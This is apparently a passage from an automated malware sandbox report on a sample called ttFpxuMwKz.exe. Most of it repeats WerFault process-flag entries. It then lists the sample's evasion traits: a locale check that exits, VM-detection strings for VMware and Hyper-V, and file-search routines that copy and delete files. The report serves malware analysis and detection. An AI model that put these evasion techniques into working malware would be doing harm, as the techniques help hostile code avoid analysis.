                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Found evasive API chain (may stop execution after checking locale)
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26357
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeEvaded block: after key decisiongraph_0-27518
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeAPI coverage: 6.5 %
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007EE077
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EF8F1 FindFirstFileA,0_2_007EF8F1
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_007EDCE7
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_007EC0D7
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007E1937
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007EF917
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007F4107
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_007EE697
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007F4B77
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007F3B17
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007F47D7
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_007EEF87
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: Amcache.hve.4.drBinary or memory string: VMware
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3
                      Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: ttFpxuMwKz.exe, 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarer
                      Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: ttFpxuMwKz.exe, 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
